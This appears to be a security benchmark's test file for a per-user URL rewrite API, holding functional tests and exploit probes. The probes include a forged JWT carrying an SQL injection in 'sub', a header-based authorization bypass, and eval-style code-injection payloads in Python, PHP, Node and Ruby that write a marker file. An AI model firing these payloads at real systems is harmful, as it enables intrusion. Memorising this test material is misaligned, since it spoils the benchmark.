# flake8: noqa
# isort: skip_file
import uuid

from exploits import execute_sql_on_docker, load_file_from_docker

generate_marker = lambda: uuid.uuid4().hex
# import libraries
from typing import Any, Dict, Optional, Tuple

import requests

import cwes
from scenarios.base import AppInstance

# shared methods
TIMEOUT = 10.0


def base_url(app: AppInstance) -> str:
    return f"http://localhost:{app.port}"


def is_2xx(status_code: int) -> bool:
    return 200 <= status_code < 300


def try_get_json(app: AppInstance, resp: requests.Response) -> Optional[Any]:
    try:
        return resp.json()
    except Exception as e:
        app.logger.warning(
            "Response is not valid JSON. Status: %d Body: %s Error: %s",
            resp.status_code,
            getattr(resp, "text", "<no text>"),
            str(e),
        )
        return None


def register_user(
    app: AppInstance, username: str, password: str
) -> Tuple[Optional[str], Optional[requests.Response]]:
    url = f"{base_url(app)}/register"
    payload = {"username": username, "password": password}
    resp = requests.post(url, json=payload, timeout=TIMEOUT)
    if not is_2xx(resp.status_code):
        app.logger.warning(
            "POST /register returned non-2xx: %d %s", resp.status_code, resp.reason
        )
        return None, resp
    data = try_get_json(app, resp)
    if (
        not isinstance(data, dict)
        or "token" not in data
        or not isinstance(data["token"], str)
    ):
        app.logger.warning("POST /register JSON missing token or wrong type: %s", data)
        return None, resp
    return data["token"], resp


def post_rules(app: AppInstance, token: str, rules: list[dict]) -> requests.Response:
    url = f"{base_url(app)}/rules"
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    payload = {"rules": rules}
    resp = requests.post(url, json=payload, headers=headers, timeout=TIMEOUT)
    return resp


def test_path(app: AppInstance, token: str, path: str) -> requests.Response:
    url = f"{base_url(app)}/test"
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    params = {"path": path}
    resp = requests.get(url, headers=headers, params=params, timeout=TIMEOUT)
    return resp


# import other libraries
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from statistics import median
from typing import List, Optional, Tuple


# additional helper code not given already
def _timed_get(
    url: str,
    headers: dict,
    params: dict,
    timeout: float,
    session: Optional[requests.Session] = None,
) -> Tuple[float, Optional[requests.Response], Optional[BaseException]]:
    sess = session or requests.Session()
    start = time.perf_counter()
    try:
        resp = sess.get(url, headers=headers, params=params, timeout=timeout)
        elapsed = time.perf_counter() - start
        return elapsed, resp, None
    except BaseException as e:
        elapsed = time.perf_counter() - start
        return elapsed, None, e


# import other libraries
# additional helper code not given already


# import other libraries
# additional helper code not given already


# import other libraries
# additional helper code not given already
import base64
import hashlib
import hmac
import json
import re
import time

# import other libraries
# additional helper code not given already
import uuid
from typing import Any, Dict, List, Optional, Set, Tuple

# import other libraries
# additional helper code not given already


def func_test_register_set_rule_and_rewrite(app: AppInstance) -> bool:
    # Step 1: register with a compliant password
    token, reg_resp = register_user(app, "alice1", "s3cretPass!")
    if token is None:
        return False
    app.logger.info("Registered user alice1; token received.")

    # Step 2: set single rule
    rules_payload = [
        {"id": "rule-1", "pattern": "^/old/(.*)$", "replacement": "/new/$1"}
    ]
    rules_resp = post_rules(app, token, rules_payload)
    if not is_2xx(rules_resp.status_code):
        app.logger.warning(
            "POST /rules returned non-2xx: %d %s",
            rules_resp.status_code,
            rules_resp.reason,
        )
        return False
    rules_json = try_get_json(app, rules_resp)
    if (
        not isinstance(rules_json, dict)
        or "rules" not in rules_json
        or not isinstance(rules_json["rules"], list)
    ):
        app.logger.warning(
            "POST /rules missing 'rules' array in response: %s", rules_json
        )
        return False
    app.logger.info("Rules saved for alice1.")

    # Step 3: test rewrite
    path_in = "/old/abc"
    test_resp = test_path(app, token, path_in)
    if not is_2xx(test_resp.status_code):
        app.logger.warning(
            "GET /test returned non-2xx: %d %s", test_resp.status_code, test_resp.reason
        )
        return False
    test_json = try_get_json(app, test_resp)
    if not isinstance(test_json, dict):
        return False

    expected = {
        "inputPath": path_in,
        "rewrittenPath": "/new/abc",
        "matchedRuleId": "rule-1",
    }
    ok = (
        test_json.get("inputPath") == expected["inputPath"]
        and test_json.get("rewrittenPath") == expected["rewrittenPath"]
        and test_json.get("matchedRuleId") == expected["matchedRuleId"]
    )
    if not ok:
        app.logger.warning(
            "Unexpected /test result. Expected %s, got %s", expected, test_json
        )
        return False
    return True


def func_test_no_rules_no_change(app: AppInstance) -> bool:
    # Step 1: register with a clearly valid password (satisfies common validators)
    token, _ = register_user(app, "bob1", "P@ssw0rd123")
    if token is None:
        return False
    app.logger.info("Registered user bob1; token received.")

    # Step 2: test with no rules
    path_in = "/nochange"
    test_resp = test_path(app, token, path_in)
    if not is_2xx(test_resp.status_code):
        app.logger.warning(
            "GET /test returned non-2xx: %d %s",
            test_resp.status_code,
            test_resp.reason,
        )
        return False

    test_json = try_get_json(app, test_resp)
    if not isinstance(test_json, dict):
        app.logger.warning("GET /test did not return a JSON object.")
        return False

    # Ensure all required fields are present per schema
    for key in ("inputPath", "rewrittenPath", "matchedRuleId"):
        if key not in test_json:
            app.logger.warning(
                "GET /test JSON missing required field '%s': %s", key, test_json
            )
            return False

    # Validate types and values
    if not isinstance(test_json["inputPath"], str) or not isinstance(
        test_json["rewrittenPath"], str
    ):
        app.logger.warning("GET /test JSON fields have wrong types: %s", test_json)
        return False

    expected_input = path_in
    expected_rewritten = path_in
    if (
        test_json["inputPath"] != expected_input
        or test_json["rewrittenPath"] != expected_rewritten
    ):
        app.logger.warning(
            "Unexpected /test result. Expected input=%s rewritten=%s, got %s",
            expected_input,
            expected_rewritten,
            test_json,
        )
        return False

    if test_json["matchedRuleId"] is not None:
        app.logger.warning(
            "Expected matchedRuleId to be null when no rule matches; got %s",
            test_json["matchedRuleId"],
        )
        return False

    return True


def func_test_first_matching_rule_applied(app: AppInstance) -> bool:
    # Step 1: register
    token, _ = register_user(app, "carol1", "p@ss3")
    if token is None:
        return False
    app.logger.info("Registered user carol1; token received.")

    # Step 2: set multiple rules where both could match
    rules_payload = [
        {"id": "rule-1", "pattern": "^/old/.*$", "replacement": "/first"},
        {"id": "rule-2", "pattern": "^/old/abc$", "replacement": "/second"},
    ]
    rules_resp = post_rules(app, token, rules_payload)
    if not is_2xx(rules_resp.status_code):
        app.logger.warning(
            "POST /rules returned non-2xx: %d %s",
            rules_resp.status_code,
            rules_resp.reason,
        )
        return False
    rules_json = try_get_json(app, rules_resp)
    if (
        not isinstance(rules_json, dict)
        or "rules" not in rules_json
        or not isinstance(rules_json["rules"], list)
    ):
        app.logger.warning(
            "POST /rules missing 'rules' array in response: %s", rules_json
        )
        return False
    app.logger.info("Rules saved for carol1.")

    # Step 3: test rewrite should apply the first rule only
    path_in = "/old/abc"
    test_resp = test_path(app, token, path_in)
    if not is_2xx(test_resp.status_code):
        app.logger.warning(
            "GET /test returned non-2xx: %d %s", test_resp.status_code, test_resp.reason
        )
        return False
    test_json = try_get_json(app, test_resp)
    if not isinstance(test_json, dict):
        return False

    expected = {
        "inputPath": path_in,
        "rewrittenPath": "/first",
        "matchedRuleId": "rule-1",
    }
    ok = (
        test_json.get("inputPath") == expected["inputPath"]
        and test_json.get("rewrittenPath") == expected["rewrittenPath"]
        and test_json.get("matchedRuleId") == expected["matchedRuleId"]
    )
    if not ok:
        app.logger.warning(
            "Unexpected /test result. Expected %s, got %s", expected, test_json
        )
        return False
    return True


def func_test_rules_replacement_updates_behavior(app: AppInstance) -> bool:
    # Step 1: register
    token, _ = register_user(app, "dave1", "p@ss4")
    if token is None:
        return False
    app.logger.info("Registered user dave1; token received.")

    # Step 2: set initial rules
    rules_payload_v1 = [
        {"id": "rule-1", "pattern": "^/a/(.*)$", "replacement": "/b/$1"}
    ]
    resp_v1 = post_rules(app, token, rules_payload_v1)
    if not is_2xx(resp_v1.status_code):
        app.logger.warning(
            "POST /rules (v1) returned non-2xx: %d %s",
            resp_v1.status_code,
            resp_v1.reason,
        )
        return False
    rules_json_v1 = try_get_json(app, resp_v1)
    if (
        not isinstance(rules_json_v1, dict)
        or "rules" not in rules_json_v1
        or not isinstance(rules_json_v1["rules"], list)
    ):
        app.logger.warning(
            "POST /rules (v1) missing 'rules' array in response: %s", rules_json_v1
        )
        return False

    # Step 3: verify initial rewrite
    path_in = "/a/123"
    test_resp1 = test_path(app, token, path_in)
    if not is_2xx(test_resp1.status_code):
        app.logger.warning(
            "GET /test (first) returned non-2xx: %d %s",
            test_resp1.status_code,
            test_resp1.reason,
        )
        return False
    test_json1 = try_get_json(app, test_resp1)
    if not isinstance(test_json1, dict):
        return False
    expected1 = {
        "inputPath": path_in,
        "rewrittenPath": "/b/123",
        "matchedRuleId": "rule-1",
    }
    if not (
        test_json1.get("inputPath") == expected1["inputPath"]
        and test_json1.get("rewrittenPath") == expected1["rewrittenPath"]
        and test_json1.get("matchedRuleId") == expected1["matchedRuleId"]
    ):
        app.logger.warning(
            "Unexpected first /test result. Expected %s, got %s", expected1, test_json1
        )
        return False

    # Step 4: replace rules with updated replacement
    rules_payload_v2 = [
        {"id": "rule-1", "pattern": "^/a/(.*)$", "replacement": "/c/$1"}
    ]
    resp_v2 = post_rules(app, token, rules_payload_v2)
    if not is_2xx(resp_v2.status_code):
        app.logger.warning(
            "POST /rules (v2) returned non-2xx: %d %s",
            resp_v2.status_code,
            resp_v2.reason,
        )
        return False
    rules_json_v2 = try_get_json(app, resp_v2)
    if (
        not isinstance(rules_json_v2, dict)
        or "rules" not in rules_json_v2
        or not isinstance(rules_json_v2["rules"], list)
    ):
        app.logger.warning(
            "POST /rules (v2) missing 'rules' array in response: %s", rules_json_v2
        )
        return False

    # Step 5: verify updated rewrite
    test_resp2 = test_path(app, token, path_in)
    if not is_2xx(test_resp2.status_code):
        app.logger.warning(
            "GET /test (second) returned non-2xx: %d %s",
            test_resp2.status_code,
            test_resp2.reason,
        )
        return False
    test_json2 = try_get_json(app, test_resp2)
    if not isinstance(test_json2, dict):
        return False
    expected2 = {
        "inputPath": path_in,
        "rewrittenPath": "/c/123",
        "matchedRuleId": "rule-1",
    }
    if not (
        test_json2.get("inputPath") == expected2["inputPath"]
        and test_json2.get("rewrittenPath") == expected2["rewrittenPath"]
        and test_json2.get("matchedRuleId") == expected2["matchedRuleId"]
    ):
        app.logger.warning(
            "Unexpected second /test result. Expected %s, got %s", expected2, test_json2
        )
        return False

    return True


def func_test_per_user_rule_isolation(app: AppInstance) -> bool:
    # User A registers and sets a rule
    token_a, _ = register_user(app, "eve1", "p@ss5")
    if token_a is None:
        return False
    app.logger.info("Registered user eve1; token received.")

    rules_a = [{"id": "rule-1", "pattern": "^/p/(.*)$", "replacement": "/A/$1"}]
    resp_a = post_rules(app, token_a, rules_a)
    if not is_2xx(resp_a.status_code):
        app.logger.warning(
            "POST /rules (user A) returned non-2xx: %d %s",
            resp_a.status_code,
            resp_a.reason,
        )
        return False
    rules_json_a = try_get_json(app, resp_a)
    if (
        not isinstance(rules_json_a, dict)
        or "rules" not in rules_json_a
        or not isinstance(rules_json_a["rules"], list)
    ):
        app.logger.warning(
            "POST /rules (user A) missing 'rules' array in response: %s", rules_json_a
        )
        return False

    # User B registers but sets no rules
    token_b, _ = register_user(app, "frank1", "p@ss6")
    if token_b is None:
        return False
    app.logger.info("Registered user frank1; token received.")

    # Test with user B: should not be affected by user A's rules
    path_in = "/p/xyz"
    test_resp = test_path(app, token_b, path_in)
    if not is_2xx(test_resp.status_code):
        app.logger.warning(
            "GET /test (user B) returned non-2xx: %d %s",
            test_resp.status_code,
            test_resp.reason,
        )
        return False
    test_json = try_get_json(app, test_resp)
    if not isinstance(test_json, dict):
        return False

    expected_input = path_in
    expected_rewritten = path_in
    expected_rule = None
    if (
        test_json.get("inputPath") != expected_input
        or test_json.get("rewrittenPath") != expected_rewritten
        or test_json.get("matchedRuleId") is not None
    ):
        app.logger.warning(
            "Unexpected /test result for user B. Expected input=%s rewritten=%s matchedRuleId=%s, got %s",
            expected_input,
            expected_rewritten,
            expected_rule,
            test_json,
        )
        return False

    return True


def sec_test_improper_input_validation(app: AppInstance) -> set[cwes.CWE] | None:
    """
    Exploit CWE-20: Improper Input Validation in replacement vs. capture groups.
    Strategy: Install a rule with one capturing group but reference $2 in the replacement.
    Trigger /test with a path that matches the rule to cause an unhandled exception (expected 5xx).
    On success, return {cwes.CWE.IMPROPER_INPUT_VALIDATION}; otherwise, return empty set().
    """
    result: set[cwes.CWE] = set()
    logger = app.logger

    def try_variant(
        pattern: str, replacement: str, trigger_path: str, control_path: str | None
    ) -> bool:
        # Install rules
        rules = [{"id": "rule-DoS", "pattern": pattern, "replacement": replacement}]
        resp_rules = post_rules(app, token, rules)
        logger.info(
            "POST /rules status=%d reason=%s body=%s",
            resp_rules.status_code,
            resp_rules.reason,
            getattr(resp_rules, "text", "<no text>"),
        )
        if resp_rules.status_code != 200:
            logger.warning(
                "Rules were not accepted by backend. Cannot test this variant."
            )
            return False

        # Optional control call with a non-matching path to confirm service is up and baseline works
        if control_path is not None:
            resp_control = test_path(app, token, control_path)
            logger.info(
                "GET /test control path='%s' status=%d reason=%s body=%s",
                control_path,
                resp_control.status_code,
                resp_control.reason,
                getattr(resp_control, "text", "<no text>"),
            )
            if not is_2xx(resp_control.status_code):
                logger.warning(
                    "Control path returned non-2xx; test environment may be unstable."
                )
                # Continue anyway; main check is the triggered failure

        # Triggering call expected to fail with 5xx
        resp_trigger = test_path(app, token, trigger_path)
        logger.info(
            "GET /test trigger path='%s' status=%d reason=%s body=%s",
            trigger_path,
            resp_trigger.status_code,
            resp_trigger.reason,
            getattr(resp_trigger, "text", "<no text>"),
        )
        if 500 <= resp_trigger.status_code < 600:
            logger.info(
                "Observed 5xx on trigger path; likely unhandled exception due to invalid backreference in replacement."
            )
            # Re-trigger to demonstrate determinism
            resp_trigger2 = test_path(app, token, trigger_path + "x")
            logger.info(
                "GET /test re-trigger path='%s' status=%d reason=%s body=%s",
                trigger_path + "x",
                resp_trigger2.status_code,
                resp_trigger2.reason,
                getattr(resp_trigger2, "text", "<no text>"),
            )
            if 500 <= resp_trigger2.status_code < 600:
                logger.info(
                    "Repeated 5xx confirms reproducible failure tied to the malformed rule."
                )
                return True
            else:
                logger.warning(
                    "Second trigger did not return 5xx; backend may be handling errors inconsistently."
                )
                return True  # still consider variant successful as at least one 5xx observed
        else:
            logger.info(
                "Trigger path did not result in 5xx; backend may validate/handle invalid backreferences."
            )
            return False

    # 1) Register a fresh user
    username = f"att_{generate_marker()[:8]}"
    password = "passw0rd!"
    token, resp_reg = register_user(app, username, password)
    if token is None:
        logger.warning(
            "Failed to register user. Status=%s Body=%s",
            getattr(resp_reg, "status_code", "<none>"),
            (
                getattr(resp_reg, "text", "<no text>")
                if resp_reg is not None
                else "<no response>"
            ),
        )
        return result

    logger.info(
        "Registered user '%s'. Received token of length %d.", username, len(token)
    )

    # 2) Variant A: Specific-match rule with 1 group but replacement references $2
    variant_a_ok = try_variant(
        pattern=r"^/poc/([A-Za-z]+)$",
        replacement=r"/boom/$2",
        trigger_path="/poc/abc",
        control_path="/no-trigger",
    )

    if variant_a_ok:
        result.add(cwes.CWE.IMPROPER_INPUT_VALIDATION)
        return result

    # 3) Variant B: Catch-all rule to maximize match coverage; still references non-existent $2
    variant_b_ok = try_variant(
        pattern=r"^(.*)$",
        replacement=r"/any/$2",
        trigger_path="/anything",
        control_path=None,
    )

    if variant_b_ok:
        result.add(cwes.CWE.IMPROPER_INPUT_VALIDATION)
        return result

    logger.info(
        "Did not observe 5xx in response to malformed replacement backreference; vulnerability not confirmed."
    )
    return result


def sec_test_incorrect_authorization(app: AppInstance) -> set[cwes.CWE] | None:
    findings: set[cwes.CWE] = set()
    try:
        base = base_url(app)
        app.logger.info("Starting CWE-863 test (X-User-Id override) against %s", base)

        # Create unique users
        suffix = uuid.uuid4().hex[:8]
        victim_user = f"victim_{suffix}"
        attacker_user = f"attacker_{suffix}"

        # Unique markers (do not log them)
        MV = generate_marker()
        MA = generate_marker()

        # Register users
        token_v, _ = register_user(app, victim_user, "vPass!")
        if not token_v:
            app.logger.warning("Failed to register victim user '%s'", victim_user)
            return findings

        token_a, _ = register_user(app, attacker_user, "aPass!")
        if not token_a:
            app.logger.warning("Failed to register attacker user '%s'", attacker_user)
            return findings

        # Victim sets their rule
        victim_rules = [
            {
                "id": "rule-1",
                "pattern": r"^/poc/(.*)$",
                "replacement": f"/victim-$1-{MV}",
            }
        ]
        resp = post_rules(app, token_v, victim_rules)
        if not is_2xx(resp.status_code):
            app.logger.warning(
                "Victim POST /rules failed: %d %s", resp.status_code, resp.reason
            )
            return findings

        # Baseline test as victim
        test_path_str = "/poc/demo"
        resp = test_path(app, token_v, test_path_str)
        if not is_2xx(resp.status_code):
            app.logger.warning(
                "Victim GET /test baseline failed: %d %s", resp.status_code, resp.reason
            )
            return findings
        data = try_get_json(app, resp)
        if not isinstance(data, dict):
            app.logger.warning("Victim GET /test baseline returned non-dict JSON.")
            return findings

        expected_victim_rewrite = f"/victim-demo-{MV}"
        if (
            data.get("matchedRuleId") != "rule-1"
            or data.get("rewrittenPath") != expected_victim_rewrite
        ):
            app.logger.info(
                "Baseline did not match expected victim rewrite; aborting PoC."
            )
            return findings

        # Extract victim's user id from JWT payload without verifying signature
        def _jwt_sub(tok: str) -> Optional[str]:
            try:
                parts = tok.split(".")
                if len(parts) < 2:
                    return None
                payload_b64 = parts[1]
                padding = "=" * (-len(payload_b64) % 4)
                payload = base64.urlsafe_b64decode(payload_b64 + padding)
                obj = json.loads(payload)
                sub = obj.get("sub")
                return str(sub) if sub is not None else None
            except Exception:
                return None

        victim_id = _jwt_sub(token_v)
        if not victim_id:
            app.logger.warning("Could not extract victim user id from JWT.")
            return findings

        # Attacker overwrites victim's rules by abusing X-User-Id header
        attacker_rules = [
            {
                "id": "rule-1",
                "pattern": r"^/poc/(.*)$",
                "replacement": f"/attacker-$1-{MA}",
            }
        ]
        url = f"{base}/rules"
        headers = {"Authorization": f"Bearer {token_a}", "X-User-Id": victim_id}
        resp = requests.post(
            url, json={"rules": attacker_rules}, headers=headers, timeout=TIMEOUT
        )
        if not is_2xx(resp.status_code):
            app.logger.warning(
                "Attacker POST /rules with X-User-Id failed: %d %s",
                resp.status_code,
                resp.reason,
            )
            return findings

        # Re-test as victim; if changed to attacker's value, auth is broken
        resp = test_path(app, token_v, test_path_str)
        if not is_2xx(resp.status_code):
            app.logger.warning(
                "Victim GET /test after attacker change failed: %d %s",
                resp.status_code,
                resp.reason,
            )
            return findings
        data2 = try_get_json(app, resp)
        if not isinstance(data2, dict):
            app.logger.warning(
                "Victim GET /test after attacker change returned non-dict JSON."
            )
            return findings

        expected_attacker_rewrite = f"/attacker-demo-{MA}"
        if (
            data2.get("matchedRuleId") == "rule-1"
            and data2.get("rewrittenPath") == expected_attacker_rewrite
        ):
            findings.add(cwes.CWE.INCORRECT_AUTHORIZATION)
            app.logger.info(
                "CWE-863 detected: attacker modified victim rules via X-User-Id header."
            )
        else:
            app.logger.info(
                "No incorrect authorization detected via X-User-Id override."
            )

        return findings

    except Exception as e:
        app.logger.exception("Exception during CWE-863 test: %s", str(e))
        return findings


def sec_test_sql_injection(app: AppInstance) -> set[cwes.CWE] | None:
    findings: set[cwes.CWE] = set()

    # Helpers
    def is_2xx(status_code: int) -> bool:
        return 200 <= status_code < 300

    def b64url(b: bytes) -> str:
        import base64

        return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

    def craft_hs256_jwt(sub: str, secret: str, exp_secs: int = 3600) -> str:
        import json, time, hmac, hashlib

        header = {"alg": "HS256", "typ": "JWT"}
        payload = {"sub": sub, "exp": int(time.time()) + exp_secs}
        h = b64url(json.dumps(header, separators=(",", ":")).encode())
        p = b64url(json.dumps(payload, separators=(",", ":")).encode())
        signing_input = f"{h}.{p}".encode()
        sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        s = b64url(sig)
        return f"{h}.{p}.{s}"

    # Shared helpers from header
    marker = generate_marker()
    victim_user = f"victim_{uuid.uuid4().hex[:8]}"
    victim_pass = f"Victim_{uuid.uuid4().hex[:8]}!"
    attacker_user = f"attacker_{uuid.uuid4().hex[:8]}"
    attacker_pass = f"Att_{uuid.uuid4().hex[:8]}!"
    test_path_input = "/old/abc"

    # 1) Register victim and set baseline rule
    token_victim, resp = register_user(app, victim_user, victim_pass)
    if not token_victim:
        return findings

    victim_rule = {
        "id": "victim-rule",
        "pattern": "^/old/(.*)$",
        "replacement": "/new/$1",
    }
    resp = post_rules(app, token_victim, [victim_rule])
    if not is_2xx(resp.status_code):
        return findings

    resp = test_path(app, token_victim, test_path_input)
    if not is_2xx(resp.status_code):
        return findings
    base = try_get_json(app, resp)
    if (
        not isinstance(base, dict)
        or base.get("matchedRuleId") is None
        or base.get("rewrittenPath") != "/new/abc"
    ):
        return findings

    # 2) Forge a JWT with SQL injection in sub using known SECRET_KEY
    secret_key = "your-secret-key-change-in-production"
    injected_sub = "1 OR 1=1"
    token_injected = craft_hs256_jwt(injected_sub, secret_key)

    # 3) Use injected token to replace rules globally via unsafe DELETE WHERE user_id = {user_id}
    #    and insert an attacker rule that will be associated to user_id 1 (victim) in SQLite.
    attacker_rule = {"id": "pwn", "pattern": "^.*$", "replacement": f"/pwned-{marker}"}
    resp = post_rules(app, token_injected, [attacker_rule])
    app.logger.info(
        "POST /rules with injected JWT returned: %d %s", resp.status_code, resp.reason
    )

    # 4) Validate cross-tenant impact against victim
    resp = test_path(app, token_victim, test_path_input)
    if not is_2xx(resp.status_code):
        return findings
    after = try_get_json(app, resp)
    if isinstance(after, dict):
        rw = after.get("rewrittenPath", "")
        mid = after.get("matchedRuleId")
        # Success if victim now matches attacker rule (contains marker) or victim rule deleted (no match)
        if isinstance(rw, str) and marker in rw:
            findings.add(cwes.CWE.SQL_INJECTION)
            return findings
        if mid is None and rw == test_path_input:
            findings.add(cwes.CWE.SQL_INJECTION)
            return findings

    return findings


def sec_test_code_injection(app: AppInstance) -> set[cwes.CWE] | None:
    """
    Attempt to exploit CWE-94 (Code Injection) by submitting attacker-controlled
    regex patterns/replacements that unsafe implementations evaluate.
    On success, returns {cwes.CWE.CODE_INJECTION}; otherwise returns set().
    """
    findings: set[cwes.CWE] = set()
    marker = generate_marker()
    target_file = f"{app.env.workdir}/rewrite_poc_{marker}"

    # 1) Register a user and get token
    username = f"attacker_{uuid.uuid4().hex[:8]}"
    password = "StrongPass!42"
    token, reg_resp = register_user(app, username, password)
    if not token:
        app.logger.warning(
            "Could not obtain token from /register; aborting code injection test."
        )
        return findings

    app.logger.info("Registered test user and obtained token for code injection test.")

    # Variants to attempt; include explicit support for the vulnerable 'eval:' prefix in the backend.
    variants = [
        {
            "name": "py-eval-prefix",
            # Matches the backend's translate_replacement() behavior: execute eval(...) when replacement starts with "eval:"
            "rule": {
                "id": "rule-py-eval-prefix",
                "pattern": "^/(.*)$",
                "replacement": "eval:(__import__('builtins').open(r'%s','w').write('%s'), '/poc')[1]"
                % (target_file, marker),
            },
            "trigger_path": "/probe_py_eval_prefix",
        },
        {
            "name": "php-pcre-e",
            "rule": {
                "id": "rule-php-e",
                "pattern": "/.*/e",
                "replacement": "file_put_contents('%s','%s').\"$0\""
                % (target_file, marker),
            },
            "trigger_path": "/probe_php_e",
        },
        {
            "name": "js-iife-eval",
            "rule": {
                "id": "rule-js-iife",
                "pattern": "^/(.*)$",
                "replacement": "(()=>{require('fs').writeFileSync('%s','%s');return '/poc';})()"
                % (target_file, marker),
            },
            "trigger_path": "/probe_js_iife",
        },
        {
            "name": "js-template-eval",
            "rule": {
                "id": "rule-js-template",
                "pattern": "^/(.*)$",
                "replacement": "${(()=>{require('fs').writeFileSync('%s','%s');return ''})()}/$1"
                % (target_file, marker),
            },
            "trigger_path": "/probe_js_tpl",
        },
        {
            "name": "py-eval",
            "rule": {
                "id": "rule-py-eval",
                "pattern": "^/(.*)$",
                "replacement": "(__import__('builtins').open(r'%s','w').write('%s'), '/poc')[1]"
                % (target_file, marker),
            },
            "trigger_path": "/probe_py_eval",
        },
        {
            "name": "rb-eval",
            "rule": {
                "id": "rule-rb-eval",
                "pattern": "^/(.*)$",
                "replacement": "#{File.write('%s','%s')}/$1" % (target_file, marker),
            },
            "trigger_path": "/probe_rb_eval",
        },
    ]

    def _trigger_and_check(token: str, path_to_test: str) -> bool:
        try:
            resp = test_path(app, token, path_to_test)
            if not is_2xx(resp.status_code):
                app.logger.debug(
                    "GET /test returned %d during trigger.", resp.status_code
                )
            # small delay in case of async file operations
            time.sleep(0.1)
            try:
                data = load_file_from_docker(app.container_id, target_file)
                if (
                    isinstance(data, (bytes, bytearray))
                    and data.decode(errors="ignore") == marker
                ):
                    return True
            except BaseException:
                return False
            return False
        except BaseException as e:
            app.logger.debug("Trigger/check raised exception: %s", str(e))
            return False

    for idx, variant in enumerate(variants):
        name = variant.get("name", f"variant-{idx}")
        app.logger.info("Attempting code injection variant: %s", name)

        try:
            resp = post_rules(app, token, [variant["rule"]])
            if not is_2xx(resp.status_code):
                app.logger.debug(
                    "POST /rules failed for %s: %d %s",
                    name,
                    resp.status_code,
                    resp.reason,
                )
                continue
        except BaseException as e:
            app.logger.debug("POST /rules exception for %s: %s", name, str(e))
            continue

        success = _trigger_and_check(
            token, variant["trigger_path"]
        ) or _trigger_and_check(token, variant["trigger_path"] + "_2")
        if success:
            app.logger.info("Code injection likely succeeded using variant: %s", name)
            findings.add(cwes.CWE.CODE_INJECTION)
            break
        else:
            app.logger.info("Variant %s did not yield observable side effects.", name)

    if not findings:
        app.logger.info(
            "No evidence of code injection vulnerability detected with attempted variants."
        )

    return findings


_API_SPEC = """
openapi: 3.0.3
info:
  title: RewriteCanvas_PersonalURLRuleTester
  description: A per-user URL rewrite rule tester with endpoints to register, manage per-user ordered rewrite rules, and test path rewrites.
  version: 1.0.0
paths:
  /register:
    post:
      summary: Register a new user and receive an auth token
      requestBody:
        required: true
        content:
          application/json:
            schema:
              $ref: '#/components/schemas/RegisterRequest'
      responses:
        '201':
          description: User registered
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/RegisterResponse'
        '400':
          description: Invalid input
        '422':
          description: Malformed request
  /rules:
    post:
      summary: Replace the user's ordered list of rewrite rules (add/update by id)
      security:
        - bearerAuth: []
      requestBody:
        required: true
        content:
          application/json:
            schema:
              $ref: '#/components/schemas/RulesRequest'
      responses:
        '200':
          description: Rules saved
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/RulesResponse'
        '400':
          description: Invalid rules payload
        '401':
          description: Unauthorized
        '422':
          description: Malformed request
  /test:
    get:
      summary: Apply the first matching rule to an input path and return the result
      security:
        - bearerAuth: []
      parameters:
        - in: query
          name: path
          required: true
          description: The input path to test (e.g., /old/abc)
          schema:
            type: string
            example: /old/abc
      responses:
        '200':
          description: Rewrite result
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/TestResponse'
        '400':
          description: Invalid query
        '401':
          description: Unauthorized
        '422':
          description: Malformed request
components:
  securitySchemes:
    bearerAuth:
      type: http
      scheme: bearer
      bearerFormat: JWT
  schemas:
    RegisterRequest:
      type: object
      properties:
        username:
          type: string
          example: alice
        password:
          type: string
          format: password
          example: s3cretPass!
      required:
        - username
        - password
    RegisterResponse:
      type: object
      properties:
        token:
          type: string
          description: Bearer token to authenticate subsequent requests
          example: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      required:
        - token
    Rule:
      type: object
      properties:
        id:
          type: string
          description: Client-supplied identifier unique per user and used for updates
          example: rule-1
        pattern:
          type: string
          description: Regular expression to match against the input path
          example: ^/old/(.*)$
        replacement:
          type: string
          description: Replacement string; supports numbered capture groups like $1, $2
          example: /new/$1
      required:
        - id
        - pattern
        - replacement
    RulesRequest:
      type: object
      properties:
        rules:
          type: array
          description: The complete ordered list of rules for the user; replaces any existing list
          items:
            $ref: '#/components/schemas/Rule'
      required:
        - rules
    RulesResponse:
      type: object
      properties:
        rules:
          type: array
          items:
            $ref: '#/components/schemas/Rule'
      required:
        - rules
    TestResponse:
      type: object
      properties:
        inputPath:
          type: string
          example: /old/abc
        rewrittenPath:
          type: string
          example: /new/abc
        matchedRuleId:
          type: string
          nullable: true
          description: Identifier of the first rule that matched; null if no rule matched
          example: rule-1
      required:
        - inputPath
        - rewrittenPath
        - matchedRuleId
"""

_TEXT_SPEC = """
RewriteCanvas_PersonalURLRuleTester provides per-user URL rewrite rule management and testing. Users register to obtain a bearer token, then authenticate to manage an ordered list of regex-based rewrite rules and test path rewrites. Users and their rules persist across calls.

Authentication
- Endpoints /rules and /test require a bearer token (HTTP Authorization: Bearer <token>) issued by /register (JWT format per bearerAuth scheme).

POST /register
- Purpose: Create a new user and receive an auth token.
- Request body (application/json):
  - username (string, required)
  - password (string, required)
- Responses:
  - 201: { token: string } — token for authenticating subsequent requests.
  - 400: Invalid input
  - 422: Malformed request

POST /rules
- Purpose: Replace the caller’s complete ordered list of rewrite rules (add/update by id).
- Auth: Bearer token required.
- Request body (application/json):
  - rules (array, required): ordered list of Rule objects; replaces any existing list.
    - Rule:
      - id (string, required): client-supplied identifier unique per user; used for updates.
      - pattern (string, required): regular expression matched against the input path.
      - replacement (string, required): replacement string supporting numbered capture groups like $1, $2.
- Responses:
  - 200: { rules: Rule[] } — the saved rules in their stored order.
  - 400: Invalid rules payload
  - 401: Unauthorized
  - 422: Malformed request

GET /test
- Purpose: Apply the first matching rule to an input path and return the rewrite result.
- Auth: Bearer token required.
- Query parameters:
  - path (string, required): the input path to test (e.g., /old/abc).
- Behavior:
  - Evaluates rules in order; applies the first whose pattern matches.
  - Produces rewrittenPath using the rule’s replacement (supports $1, $2, ...).
  - If no rule matches, returns the original path unchanged.
- Responses (application/json):
  - 200: {
      inputPath: string,
      rewrittenPath: string,
      matchedRuleId: string|null  // id of first matching rule; null if none matched
    }
  - 400: Invalid query
  - 401: Unauthorized
  - 422: Malformed request
"""

from scenarios.base import Scenario

